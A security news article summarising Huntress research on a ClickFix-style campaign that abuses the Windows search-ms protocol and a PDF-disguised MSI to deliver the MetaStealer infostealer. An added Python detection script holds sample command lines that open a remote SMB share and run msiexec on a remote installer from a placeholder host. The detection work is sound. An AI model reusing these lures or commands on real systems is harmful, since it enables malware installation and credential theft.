ClickFix initial access | Source: TRU
For over a year, Huntress researchers have been tracking the rise of ClickFix attacks, a form of social engineering that tricks users into executing malicious code by disguising it as a CAPTCHA verification. In their latest analysis, Huntress warns that adversaries are now blending ClickFix techniques with new twists, including the abuse of the Windows search protocol and disguised PDF lures, to ultimately deliver MetaStealer, a commodity infostealer active since 2022.
At its core, ClickFix relies on tricking users into “fixing” a supposed issue, often by interacting with a CAPTCHA-style page. As Huntress explains, “The premise of ClickFix is that threat actors convince users to ‘fix’ a purported issue, usually with a CAPTCHA on a webpage that they arrive on via a phishing message.” The “fix” is actually a command that victims copy and paste into Windows Run or PowerShell, silently kicking off the infection chain.
But attackers have been diversifying. “A few months ago, attackers turned to a similar technique, dubbed FileFix, which involves Windows File Explorer instead of the Run dialog box,” Huntress notes. These variants show how social engineering and “mundane” processes like CAPTCHAs continue to be weaponized.
The report details a recent campaign beginning with a fake AnyDesk installer hosted at anydeesk[.]ink. Victims who landed on the site were shown a fake Cloudflare Turnstile verification, urging them to “click to verify you are human.”
“Up to this point, this has all the tell-tale signs of a ClickFix campaign,” Huntress writes. But instead of leading to Run or PowerShell, the prompts abused the Windows search protocol (search-ms URI), redirecting victims into File Explorer.
Once inside Explorer, the victim was directed to an attacker-controlled SMB share containing a shortcut LNK file disguised as Readme Anydesk.pdf. Clicking it triggered the next stage.

The malicious LNK, masquerading as a PDF, dropped both a legitimate AnyDesk installer (to avoid suspicion) and a fake PDF that was in fact an MSI package.
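As an added example (not code from the Huntress report or this article), the following Python triages constructed Sysmon-style process command lines for the two hand-offs in the chain just described: File Explorer being launched with a search-ms URI whose crumb location is a remote UNC share, and msiexec being handed an installer named like a PDF. The host 203.0.113.10, the share name and the file names are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed command lines from Sysmon-style process-creation events; host, share and file names are placeholders.
SAMPLE_COMMAND_LINES = [
    # Browser hands File Explorer a search-ms URI whose crumb location is a remote SMB share.
    r'"C:\Windows\explorer.exe" "search-ms:query=Readme&crumb=location:\\203.0.113.10\share&displayname=Downloads"',
    # Benign use of the same protocol against a local folder.
    r'"C:\Windows\explorer.exe" search-ms:query=budget&crumb=location:C:\Users\alice\Documents',
    # msiexec asked to install a file named like a PDF, served from the same share.
    r'msiexec.exe /i "\\203.0.113.10\share\Readme Anydesk.pdf"',
]

SEARCH_MS_URI = re.compile(r"search-ms:([^\"\s]+)", re.IGNORECASE)
MSIEXEC_TARGET = re.compile(r"/i\s+(?:\"([^\"]+)\"|(\S+))", re.IGNORECASE)

def search_ms_location(cmdline):
    """Return the crumb=location: target of a search-ms URI in the command line, or None."""
    m = SEARCH_MS_URI.search(cmdline)
    if not m:
        return None
    for crumb in parse_qs(unquote(m.group(1))).get("crumb", []):
        if crumb.lower().startswith("location:"):
            return crumb[len("location:"):]
    return None

def is_remote(location):
    """True when the search location is a UNC path or a file:/smb: URL rather than a local folder."""
    return location.strip().lower().startswith(("\\\\", "//", "file:", "smb:"))

def msiexec_nonmsi_target(cmdline):
    """Return the msiexec /i install target if its extension is not .msi/.msp, else None."""
    m = MSIEXEC_TARGET.search(cmdline)
    if not m:
        return None
    target = m.group(1) or m.group(2)
    return None if target.lower().endswith((".msi", ".msp")) else target

def triage(cmdlines):
    """Return (index, reason) for each command line matching one of the described hand-offs."""
    findings = []
    for i, cmd in enumerate(cmdlines):
        loc = search_ms_location(cmd)
        if loc and is_remote(loc):
            findings.append((i, f"search-ms opens remote location {loc}"))
        target = msiexec_nonmsi_target(cmd)
        if target:
            findings.append((i, f"msiexec install target lacks .msi extension: {target}"))
    return findings
```

Running `triage(SAMPLE_COMMAND_LINES)` flags the first and third records and leaves the local search alone, which is the distinction a detection rule on this protocol needs to make.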
Huntress highlights a clever trick: “Notably, this fake PDF is configured to grab the %COMPUTERNAME% environment variable as a subdomain. This is a clever way for the attacker to nab that information from the victim.”
Inside the MSI, researchers uncovered:
- A DLL (CustomActionDLL)
- A CAB archive containing malicious files, including 1.js (cleanup script) and ls26.exe (the MetaStealer dropper)
Protected with Private EXE Protector, MetaStealer carried out its usual infostealer behavior: stealing from crypto wallets, harvesting credentials, and exfiltrating files.
ClickFix, FileFix, and now this hybrid approach thrive because they combine social engineering with semi-legitimate workflows. Users believe they are fixing a verification error, and by taking the action themselves, they inadvertently bypass traditional security controls.
As Huntress warns: “These types of attacks that require some level of manual interaction… work in part because they can potentially circumvent security solutions.”